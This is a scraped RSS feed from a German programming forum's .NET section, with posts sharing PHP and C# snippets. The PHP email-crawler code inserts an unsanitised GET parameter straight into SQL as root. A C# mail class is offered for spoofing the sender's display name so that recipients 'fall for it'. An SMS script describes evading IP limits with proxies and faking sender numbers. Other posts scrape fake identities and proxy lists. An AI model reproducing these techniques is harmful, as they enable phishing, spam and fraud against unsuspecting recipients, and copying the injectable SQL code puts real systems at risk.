<span style="color: #0000BB">&lt;?php<br />$con&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">mysql_connect</span><span style="color: #007700">(</span><span style="color: #DD0000">"localhost"</span><span style="color: #007700">,</span><span style="color: #DD0000">"root"</span><span style="color: #007700">,</span><span style="color: #DD0000">""</span><span style="color: #007700">)&nbsp;or&nbsp;die(</span><span style="color: #0000BB">mysql_error</span><span style="color: #007700">());<br /></span><span style="color: #0000BB">mysql_select_db</span><span style="color: #007700">(</span><span style="color: #DD0000">"email"</span><span style="color: #007700">)&nbsp;or&nbsp;die(</span><span style="color: #0000BB">mysql_error</span><span style="color: #007700">());<br /></span><span style="color: #0000BB">$adr&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">&#91;</span><span style="color: #DD0000">"adr"</span><span style="color: #007700">&#93;;<br /></span><span style="color: #0000BB">$q&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">mysql_query</span><span style="color: #007700">(</span><span style="color: #DD0000">"INSERT&nbsp;INTO&nbsp;mylist&nbsp;(email)&nbsp;VALUES&nbsp;('</span><span style="color: #0000BB">$adr</span><span style="color: #DD0000">')"</span><span style="color: #007700">)&nbsp;or&nbsp;die(</span><span style="color: #0000BB">mysql_error</span><span style="color: #007700">());<br /></span><span style="color: #0000BB">?&gt;</span>
</span>
</code></code><hr />
</div>Tabelle:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">-- phpMyAdmin SQL Dump<br />
-- version 3.5.2<br />
-- http://www.phpmyadmin.net<br />
--<br />
-- Host: localhost<br />
-- Generation Time: Aug 11, 2012 at 11:27 AM<br />
-- Server version: 5.5.25a<br />
-- PHP Version: 5.4.4<br />
<br />
SET SQL_MODE=&quot;NO_AUTO_VALUE_ON_ZERO&quot;;<br />
SET time_zone = &quot;+00:00&quot;;<br />
<br />
<br />
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;<br />
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;<br />
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;<br />
/*!40101 SET NAMES utf8 */;<br />
<br />
--<br />
-- Database: `email`<br />
--<br />
<br />
-- --------------------------------------------------------<br />
<br />
--<br />
-- Table structure for table `mylist`<br />
--<br />
<br />
CREATE TABLE IF NOT EXISTS `mylist` (<br />
&nbsp; `id` int(11) NOT NULL AUTO_INCREMENT,<br />
&nbsp; `email` varchar(150) NOT NULL,<br />
&nbsp; PRIMARY KEY (`id`),<br />
&nbsp; UNIQUE KEY `email` (`email`)<br />
) ENGINE=InnoDB&nbsp; DEFAULT CHARSET=latin1 AUTO_INCREMENT=94 ;<br />
<br />
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;<br />
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;<br />
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;</code><hr />
</div>Man kann die Einträge auch in einer Textdatei speichern, was deutlich schneller gehen würde, ich wollte es aber so machen :P<br />
<br />
PS: Pattern sind der letzte Schrott, war aber definitiv zu faul :D</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Snees</dc:creator>
			<guid isPermaLink="true">net-94/source-emailcrawler-15525</guid>
		</item>
		<item>
			<title>C# Klasse um E-Mails zu senden</title>
			<link>net-94/klasse-um-e-mails-zu-senden-31855?goto=newpost</link>
			<pubDate>Fri, 10 Aug 2012 13:33:40 GMT</pubDate>
			<description>Hier habt ihr eine Klasse, womit ihr E-Mails senden könnt. Ich weiß nicht mehr genau ob die SMTP-Ports sich bei den ganzen E-Mail Anbietern geändert...</description>
			<content:encoded><![CDATA[<div>Hier habt ihr eine Klasse, womit ihr E-Mails senden könnt. Ich weiß nicht mehr genau ob die SMTP-Ports sich bei den ganzen E-Mail Anbietern geändert haben aber ich denke nicht und wenn, könnt ihr diese ja hier dann posten.<br />
<br />
Das beste an dieser Klasse ist, man kann irgendeinen Absender beim Anzeigenamen angeben und dieser wird dann dem Empfänger angezeigt. Wenn der Empfänger nicht soviel Ahnung hat, fällt dieser natürlich rein. :P<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
using System;<br />
using System.IO;<br />
using System.Net;<br />
using System.Net.Mail;<br />
<br />
class Mail<br />
{<br />
    String SenderMail, SenderMailPass, Receiver, DisplayName;<br />
<br />
    /// &lt;summary&gt;<br />
    /// Initialisiert eine neue Instanz der Mail-Klasse.<br />
    /// &lt;/summary&gt;<br />
    /// &lt;param name=&quot;senderMail&quot;&gt;Die E-Mail Adresse, womit die E-Mail gesendet werden soll.&lt;/param&gt;<br />
    /// &lt;param name=&quot;senderMailPass&quot;&gt;Das dazugehörige Passwort der E-Mail Adresse.&lt;/param&gt;<br />
    /// &lt;param name=&quot;receiver&quot;&gt;Der Empfänger der E-Mail.&lt;/param&gt;<br />
    /// &lt;param name=&quot;displayName&quot;&gt;Der Anzeigename der beim Empfänger als Absender angezeigt werden soll.&lt;/param&gt;<br />
    public Mail(String senderMail, String senderMailPass, String receiver, String displayName)<br />
    {<br />
        this.SenderMail = senderMail;<br />
        this.SenderMailPass = senderMailPass;<br />
        this.Receiver = receiver;<br />
        this.DisplayName = displayName;<br />
    }<br />
<br />
    /// &lt;summary&gt;<br />
    /// Sendet eine E-Mail an den angegebenen Empfänger mit den angegebenen E-Mail Daten.<br />
    /// &lt;/summary&gt;<br />
    /// &lt;param name=&quot;subject&quot;&gt;Betreff der zu sendenden E-Mail.&lt;/param&gt;<br />
    /// &lt;param name=&quot;useHTML&quot;&gt;Bestimmt, ob bei der E-Mail HTML benutzt werden soll.&lt;/param&gt;<br />
    /// &lt;param name=&quot;message&quot;&gt;Die Nachricht der E-Mail.&lt;/param&gt;<br />
    /// &lt;param name=&quot;priority&quot;&gt;Die Priorität der E-Mail.&lt;/param&gt;<br />
    /// &lt;param name=&quot;attachmentPath&quot;&gt;Gibt den Pfad zum Anhang an, wenn kein Anhang hinzugefügt werden soll, hier &quot;null&quot; angeben.&lt;/param&gt;<br />
    /// &lt;param name=&quot;mailProvider&quot;&gt;Der E-Mail Anbieter den man zum Senden der E-Mail benutzt.&lt;/param&gt;<br />
    public void Send(String subject, bool useHTML, String message, MailPriority priority, String attachmentPath, MailProvider mailProvider)<br />
    {<br />
        try<br />
        {<br />
            NetworkCredential mailCredentials = new NetworkCredential();<br />
            mailCredentials.UserName = SenderMail;<br />
            mailCredentials.Password = SenderMailPass;<br />
<br />
            MailAddress mailAddress = null;<br />
<br />
            if (!String.IsNullOrEmpty(DisplayName))<br />
                mailAddress = new MailAddress(SenderMail, DisplayName);<br />
            else<br />
                mailAddress = new MailAddress(SenderMail);<br />
<br />
            MailMessage mailMessage = new MailMessage();<br />
            mailMessage.From = mailAddress;<br />
            mailMessage.Subject = subject;<br />
            mailMessage.IsBodyHtml = useHTML;<br />
            mailMessage.Body = message;<br />
            mailMessage.Priority = priority;<br />
<br />
            if (!String.IsNullOrEmpty(attachmentPath) &amp;&amp; File.Exists(attachmentPath))<br />
                mailMessage.Attachments.Add(new Attachment(attachmentPath));<br />
<br />
            mailMessage.To.Add(Receiver);<br />
<br />
            SmtpClient smtpClient = new SmtpClient();<br />
            smtpClient.Host = getMailProviderHost(mailProvider);<br />
            smtpClient.Port = getMailProviderPort(mailProvider);<br />
            smtpClient.UseDefaultCredentials = false;<br />
            smtpClient.Credentials = mailCredentials;<br />
<br />
            smtpClient.Send(mailMessage);<br />
        }<br />
        catch (SmtpException smptpEx)<br />
        {<br />
            Console.WriteLine(smptpEx.ToString());<br />
        }<br />
    }<br />
<br />
    private String getMailProviderHost(MailProvider mailProvider)<br />
    {<br />
        switch (mailProvider)<br />
        {<br />
            case MailProvider.GMX:<br />
                return &quot;mail.gmx.net&quot;;<br />
            case MailProvider.GOOGLEMAIL:<br />
                return &quot;smtp.googlemail.com&quot;;<br />
            case MailProvider.WEB:<br />
                return &quot;smtp.web.de&quot;;<br />
            case MailProvider.YAHOO:<br />
                return &quot;smtp.mail.yahoo.de&quot;;<br />
        }<br />
        return null;<br />
    }<br />
<br />
    private int getMailProviderPort(MailProvider mailProvider)<br />
    {<br />
        switch (mailProvider)<br />
        {<br />
            case MailProvider.GMX:<br />
                return 465;<br />
            case MailProvider.GOOGLEMAIL:<br />
                return 465;<br />
            case MailProvider.WEB:<br />
                return 587;<br />
            case MailProvider.YAHOO:<br />
                return 465;<br />
        }<br />
        return 0;<br />
    }<br />
}<br />
<br />
public enum MailProvider<br />
{<br />
    WEB,<br />
    GMX,<br />
    GOOGLEMAIL,<br />
    YAHOO<br />
}<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
<b>Aufruf-Beispiel:</b><br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
            <br />
            Mail mail = new Mail(&quot;ABSENDER@web.de&quot;, &quot;PASSWORT&quot;, &quot;Kolloid@knuddels.de&quot;, &quot;Holgi@knuddels.de&quot;);<br />
            mail.Send(&quot;Hallo&quot;, false, &quot;Hey du Noob!&quot;, MailPriority.High, null, MailProvider.WEB);<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
So sieht es dann beim Empfänger aus:<br />
<br />
<a href="https://u-labs.de/forum/attachment.php?attachmentid=7475&amp;d=1396952371" id="attachment7475" rel="Lightbox_0" ><img src="https://u-labs.de/forum/attachment.php?attachmentid=7475&amp;d=1396952371&amp;thumb=1" border="0" alt="Klicke auf die Grafik für eine größere Ansicht&nbsp;

Name:	mailv2kxt.png&nbsp;
Hits:	300&nbsp;
Größe:	17,4 KB&nbsp;
ID:	7475" class="thumbnail" style="float:CONFIG" /></a></div>


	<div style="padding:10px">

	
		<fieldset class="fieldset">
			<legend>Miniaturansichten angehängter Grafiken</legend>
			<div style="padding:10px">
			
<a href="https://u-labs.de/forum/attachment.php?attachmentid=7475&amp;d=1396952371" 
rel="Lightbox_372992" id="attachment7475"
><img class="thumbnail" src="https://u-labs.de/forum/attachment.php?attachmentid=7475&amp;stc=1&amp;thumb=1&amp;d=1396952371" 
alt="Klicke auf die Grafik für eine größere Ansicht&nbsp;

Name:	mailv2kxt.png&nbsp;
Hits:	-&nbsp;
Größe:	17,4 KB&nbsp;
ID:	7475"/></a>
&nbsp;

			</div>
		</fieldset>
	

	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>The Don of NYC</dc:creator>
			<guid isPermaLink="true">net-94/klasse-um-e-mails-zu-senden-31855</guid>
		</item>
		<item>
			<title>C# mobilfunk-talk.de SMS-Versand</title>
			<link>net-94/mobilfunk-talk-de-sms-versand-15487?goto=newpost</link>
			<pubDate>Thu, 09 Aug 2012 15:26:55 GMT</pubDate>
			<description>Mit dem folgenden Script könnt ihr aus .NET heraus SMS über die Seite mobilfunk-talk.de versenden.  
Derzeit sind 2 SMS pro Tag und Handynummer mit...</description>
			<content:encoded><![CDATA[<div>Mit dem folgenden Script könnt ihr aus .NET heraus SMS über die Seite mobilfunk-talk.de versenden. <br />
Derzeit sind 2 SMS pro Tag und Handynummer mit einer maximalen Textlänge von 140 Zeichen möglich. <br />
Dazu gibt es noch ein IP-Basierendes Tageslimit von derzeit glaube ich 5 SMS pro Tag, das könnt ihr mit Proxys umgehen und weitere SMS an eine andere Nummer schicken. <br />
<br />
Es ist auch möglich, eine eigene Absendernummer festzulegen. <br />
Dafür muss im content folgendes eingefügt werden:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&amp;abs_netz=49160&amp;abs_nr=7777777</code><hr />
</div>Die Absendernummer muss nicht valide sein. Sie wird dem Empfänger als Absender angezeigt, aber nicht überprüft. <br />
In dem Beispiel wäre das 01607777777.<br />
<br />
Der Provider wird ohne führende Null übergeben, also zb 160 statt 0160.<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
bool SendSMS(string provider, string handyNr, string text) {<br />
        HttpWebRequest req = (HttpWebRequest)HttpWebRequest.Create(&quot;http://www.mobilfunk-talk.de/sms/&quot;);<br />
        HttpWebResponse resp = (HttpWebResponse)req.GetResponse();<br />
        string src = new StreamReader(resp.GetResponseStream()).ReadToEnd();<br />
        string auth = Regex.Match(src, &quot;name=\&quot;authcode\&quot; value=\&quot;(&#91;^\&quot;&#93;+)\&quot;&gt;&quot;).Groups&#91;1&#93;.Value;<br />
<br />
        req = (HttpWebRequest)HttpWebRequest.Create(&quot;http://www.mobilfunk-talk.de/sms/&quot;);<br />
        req.Method = &quot;POST&quot;;<br />
        req.ContentType = &quot;application/x-www-form-urlencoded&quot;;<br />
        byte&#91;&#93; content = Encoding.UTF8.GetBytes(string.Format(&quot;netz=49{0}&amp;nr={1}&amp;text={2}&amp;agbcheck=on&amp;counter={3}&amp;flag=1&amp;authcode={4}&quot;, provider,<br />
            handyNr, HttpUtility.UrlEncode(text), (140 - text.Length), auth));<br />
        req.ContentLength = content.Length;<br />
        req.GetRequestStream().Write(content, 0, content.Length);<br />
        resp = (HttpWebResponse)req.GetResponse();<br />
        src = new StreamReader(resp.GetResponseStream()).ReadToEnd();<br />
        return src.Contains(&quot;SMS Erfolgreich versendet&quot;);<br />
    }<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DMW007</dc:creator>
			<guid isPermaLink="true">net-94/mobilfunk-talk-de-sms-versand-15487</guid>
		</item>
		<item>
			<title>C# Identity Generator (fakenamegenerator.com)</title>
			<link>net-94/identity-generator-fakenamegenerator-com-15481?goto=newpost</link>
			<pubDate>Wed, 08 Aug 2012 21:39:50 GMT</pubDate>
			<description>Der IdentityGenerator generiert auf basis eines Geschlechts und eines Altersbereiches eine Deutsche Zufallsidentität, bestehend aus Vorname, Nachname...</description>
			<content:encoded><![CDATA[<div>Der IdentityGenerator generiert auf basis eines Geschlechts und eines Altersbereiches eine Deutsche Zufallsidentität, bestehend aus Vorname, Nachname und Alter. <br />
Hierfür wird die Seite fakenamegenerator.com genutzt. <br />
<br />
<b>IdentityGenerator.cs</b><br />
[highlight=csharp]<br />
using System;<br />
using System.Collections.Generic;<br />
using System.Linq;<br />
using System.Text;<br />
using System.Net;<br />
using System.IO;<br />
using System.Text.RegularExpressions;<br />
<br />
namespace IdentityManager {<br />
    class IdentityGenerator {<br />
        public static Identity Generate(int minAge, int maxAge, Gender gender) {<br />
            string src = GetRawData(minAge, maxAge, gender);<br />
            if (src == null)<br />
                return null;<br />
<br />
            Match name = Regex.Match(src, @&quot;&lt;h3&gt;([\w]+) ([\w]+)&lt;/h3&gt;&quot;);<br />
            Match age = Regex.Match(src, @&quot;([0-9]{1,2}) years old&quot;);<br />
            int _age = -1;<br />
            if (age.Success)<br />
                int.TryParse(age.Groups[1].Value, out _age);<br />
<br />
            Identity identity = new Identity(_age, gender, name.Groups[1].Value, name.Groups[2].Value);<br />
            return identity;<br />
        }<br />
<br />
        private static string GetRawData(int minAge, int maxAge, Gender gender) {<br />
            int male = (gender == Gender.Male) ? 100 : 0;<br />
            string url = string.Format(&quot;http://de.fakenamegenerator.com/advanced.php?n%5B%5D=gr&amp;c%5B%5D=gr&amp;gen={0}&amp;age-min={1}&amp;age-max={2}&quot;, male, minAge, maxAge);<br />
            try {<br />
                HttpWebRequest req = (HttpWebRequest)HttpWebRequest.Create(url);<br />
                req.UserAgent = &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1&quot;;<br />
                string resp = new StreamReader(req.GetResponse().GetResponseStream()  ).ReadToEnd();<br />
                return resp;<br />
            } catch (Exception) {<br />
                return null;<br />
            }<br />
        }<br />
    }<br />
}<br />
[/highlight]<br />
<br />
<b>Identity.cs</b><br />
[highlight=csharp]<br />
using System;<br />
using System.Collections.Generic;<br />
using System.Linq;<br />
using System.Text;<br />
<br />
namespace IdentityManager {<br />
    class Identity {<br />
        int _age;<br />
        Gender _gender;<br />
        string _firstName;<br />
        string _lastName;<br />
<br />
        public int Age {<br />
            get { return _age; }<br />
        }<br />
<br />
        public Gender Gender {<br />
            get { return _gender; }<br />
        }<br />
<br />
        public string FirstName {<br />
            get { return _firstName; }<br />
        }<br />
<br />
        public string LastName {<br />
            get { return _lastName; }<br />
        }<br />
<br />
        public Identity(int age, Gender gender, string firstName, string lastName) {<br />
            _age = age;<br />
            _gender = gender;<br />
            _firstName = firstName;<br />
            _lastName = lastName;<br />
        }<br />
    }<br />
}<br />
[/highlight]<br />
<br />
<b>Gender.cs</b><br />
[highlight=csharp]<br />
using System;<br />
using System.Collections.Generic;<br />
using System.Linq;<br />
using System.Text;<br />
namespace IdentityManager {<br />
    enum Gender {<br />
        Male,<br />
        Female<br />
    }<br />
}<br />
[/highlight]<br />
<br />
Beispielprogramm, dass drei Männliche Datensätze zwischen 17 und 27 ausgibt:<br />
<br />
[highlight=csharp]<br />
class Program {<br />
        static void Main(string[] args) {<br />
            for (int i = 0; i &lt; 3; i++) {<br />
                Identity identity = IdentityGenerator.Generate(17, 27, Gender.Male);<br />
                if (identity != null) {<br />
                    Console.WriteLine(&quot;Vorname: {0}\nNachname: {1}\nAlter: {2}\nGeschlecht: {3}\n&quot;, identity.FirstName, identity.LastName, identity.Age, identity.Gender);<br />
                } else {<br />
                    Console.WriteLine(&quot;Fehler beim generieren der Identität!&quot;);<br />
                }<br />
            }<br />
            Console.Read();<br />
        }<br />
    }<br />
[/highlight]<br />
<br />
Projektmappe mit Beispielprogramm befindet sich im Anhang.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DMW007</dc:creator>
			<guid isPermaLink="true">net-94/identity-generator-fakenamegenerator-com-15481</guid>
		</item>
		<item>
			<title>C# Proxybase.de ProxyCrawler</title>
			<link>net-94/proxybase-de-proxycrawler-15476?goto=newpost</link>
			<pubDate>Wed, 08 Aug 2012 16:47:31 GMT</pubDate>
			<description>Ich miste zurzeit meine VS-Projekte aus, und werde daher alles was meiner Meinung nach sinnvoll ist und public werden darf hier posten.  
 
Die...</description>
			<content:encoded><![CDATA[<div>Ich miste zurzeit meine VS-Projekte aus, und werde daher alles was meiner Meinung nach sinnvoll ist und public werden darf hier posten. <br />
<br />
Die Funktion sammelt alle verfügbaren Proxys von der Seite <a href="http://www.proxybase.de/" target="_blank" rel="nofollow">ProxyBase.de | Proxyliste und Proxychecker</a> in einem Array.<br />
Das lohnt sich bei dieser Seite besonders, da deren Datenbank mehr als 3k Proxys enthält. <br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
void Proxybase_DE(List&lt;string&gt; proxys) {<br />
        WebClient client = new WebClient();<br />
        int page = 0;<br />
        string src = &quot;&quot;;<br />
<br />
        do {<br />
            src = client.DownloadString(string.Format(&quot;http://www.proxybase.de/index.php?start={0}&quot;, page));<br />
<br />
            MatchCollection matches = Regex.Matches(src, @&quot;&gt;(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,6})&quot;);<br />
            if (matches.Count == 0)<br />
                break;<br />
<br />
            for (int i = 0; i &lt; matches.Count; i++) {<br />
                string proxy = matches&#91;i&#93;.Groups&#91;1&#93;.Value;<br />
                if (!proxys.Contains(proxy)) {<br />
                    proxys.Add(proxy);<br />
                }<br />
            }<br />
            page += 25;<br />
        } while (src.Contains(&quot;&lt;div id='balken&quot;));<br />
    }<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Beispielaufruf:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
List&lt;string&gt; proxys = new List&lt;string&gt;();<br />
Proxybase_DE(proxys);<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Im Anhang findet ihr noch ein Beispieltool, dass alle Proxys ausließt und anschließend in eine Textdatei schreibt (Format: IP: Port, 1 Proxy pro Zeile).<br />
Pro Seite werden 25 Proxys gecrawled, es dauert bei 3k also logischerweise ein paar Minuten, bis der Crawler alle durch hat.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DMW007</dc:creator>
			<guid isPermaLink="true">net-94/proxybase-de-proxycrawler-15476</guid>
		</item>
		<item>
			<title>C# fake-it.biz Daten auslesen (Fake-Identität)</title>
			<link>net-94/fake-it-biz-daten-auslesen-fake-identitaet-15468?goto=newpost</link>
			<pubDate>Tue, 07 Aug 2012 23:58:19 GMT</pubDate>
			<description><![CDATA[Grad durch Zufall gefunden, vielleicht kanns ja jemand brauchen.  
 
class Program { 
    static void Main(string[] args) { 
        WebRequest req =...]]></description>
			<content:encoded><![CDATA[<div>Grad durch Zufall gefunden, vielleicht kanns ja jemand brauchen. <br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
class Program {<br />
    static void Main(string&#91;&#93; args) {<br />
        WebRequest req = WebRequest.Create(&quot;http://www.fake-it.biz/&quot;);<br />
        string resp = new StreamReader(req.GetResponse().GetResponseStream(), Encoding.GetEncoding(&quot;ISO-8859-1&quot;)).ReadToEnd();<br />
<br />
        MatchCollection mc = Regex.Matches(resp, @&quot;&lt;td&gt;(&#91;\w\s()@/\.,-&#93;+)\n&quot;);<br />
        foreach (Match m in mc) {<br />
            string value = m.Groups&#91;1&#93;.Value.TrimStart();<br />
            Console.WriteLine(value);<br />
        }<br />
<br />
        Console.WriteLine(&quot;Count: {0}&quot;, mc.Count);<br />
        Console.Read();<br />
    }<br />
}
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
<br />
Ergebnis<br />
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=8251&amp;d=1415302082" border="0" alt="Name:  randomidentity.PNG
Hits: 2738
Größe:  9,8 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
Die Domainendung der eMails fehlen.<br />
Liegt aber an <a href="http://www.fake-it.biz" target="_blank" rel="nofollow">Fake-it.biz</a>, damals als ich das gebraucht habe war das noch nicht so.</div>


	<div style="padding:10px">

	

	
		<fieldset class="fieldset">
			<legend>Angehängte Grafiken</legend>
				<div style="padding:10px">
				<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=8251&amp;stc=1&amp;d=1415302082" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DMW007</dc:creator>
			<guid isPermaLink="true">net-94/fake-it-biz-daten-auslesen-fake-identitaet-15468</guid>
		</item>
		<item>
			<title>C# Konsole Schließen Button deaktivieren</title>
			<link>net-94/konsole-schliessen-button-deaktivieren-15467?goto=newpost</link>
			<pubDate>Tue, 07 Aug 2012 23:30:01 GMT</pubDate>
			<description>Topic, ich will in einem Konsolenfenster den Schließen-Button deaktivieren.  
In WinForms kein Problem, aber wie mache ich das in der Konsole?</description>
			<content:encoded><![CDATA[<div>Topic, ich will in einem Konsolenfenster den Schließen-Button deaktivieren. <br />
In WinForms kein Problem, aber wie mache ich das in der Konsole?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Minecraft</dc:creator>
			<guid isPermaLink="true">net-94/konsole-schliessen-button-deaktivieren-15467</guid>
		</item>
		<item>
			<title>C# GenerateSecurePassword</title>
			<link>net-94/generatesecurepassword-15452?goto=newpost</link>
			<pubDate>Tue, 07 Aug 2012 14:36:24 GMT</pubDate>
			<description><![CDATA[Hallo, 
 
folgende Funktion: 
 
 
PHP: 
--------- 
 /// <summary> 
        /// Generiert ein Sicheres Passwort! 
        /// </summary>]]></description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
folgende Funktion:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;</span><span style="color: #FF8000">///&nbsp;&lt;summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;Generiert&nbsp;ein&nbsp;Sicheres&nbsp;Passwort!<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;/summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;param&nbsp;name="length"&gt;Die&nbsp;Länge&nbsp;des&nbsp;gewünschten&nbsp;Passworts&lt;/param&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;returns&gt;Ein&nbsp;sicheres&nbsp;Passwort&nbsp;in&nbsp;Form&nbsp;eines&nbsp;Strings&lt;/returns&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">public&nbsp;</span><span style="color: #0000BB">String&nbsp;GenerateSecurePassword</span><span style="color: #007700">(</span><span style="color: #0000BB">int&nbsp;length</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">length&nbsp;</span><span style="color: #007700">&lt;=&nbsp;</span><span style="color: #0000BB">8</span><span style="color: #007700">)&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #DD0000">"Password-Length&nbsp;must&nbsp;be&nbsp;over&nbsp;8&nbsp;to&nbsp;be&nbsp;secure!"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">StringBuilder&nbsp;password&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">StringBuilder</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">char</span><span style="color: #007700">?&nbsp;</span><span style="color: #0000BB">lastChar&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Random&nbsp;rnd&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">Random</span><span style="color: #007700">();<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;(</span><span style="color: #0000BB">int&nbsp;i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">i&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">length</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">i</span><span style="color: #007700">++)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">char&nbsp;generatedChar</span><span style="color: #007700">;<br /><br 